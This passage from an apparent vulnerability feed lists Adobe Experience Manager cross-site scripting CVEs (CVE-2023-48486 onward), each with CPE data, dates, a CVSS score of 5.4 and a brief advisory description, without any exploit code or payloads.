https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48486

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:32:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48486
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48487

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:32:32

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48487
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48488

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48488
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48489

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:21

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48489
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48490

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48490
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48491

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:13

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48491
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48492

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:09

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48492
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48493

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:17:25

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48493
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48494

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:17:35

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48494
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48495

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:17:43

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48495
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48496

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:17:49

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48496
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48497

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:18:05

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48497
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48498

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:18:12

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48498
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48499

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:18:19

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48499
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48500

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:18:32

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48500
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48501

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:18:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48501
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48502

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:19:24

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48502
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48503

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:18:51

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48503
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48504

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:19:02

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48504
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48505

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:19:08

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48505
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48506

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:19:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48506
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48507

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:23:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48507
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48508

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:23:51

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48508
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48509

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:24:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48509
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48510

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:24:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48510
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48511

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:24:42

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48511
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48512

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:24:53

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48512
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48513

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48513
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48514

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:09

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48514
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48515

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48515
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48516

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:34

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48516
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48517

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:46

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48517
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48518

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:25:53

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48518
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48519

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:26:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48519
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48520

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:26:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48520
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48521

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:26:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48521
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48522

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:26:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48522
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48523

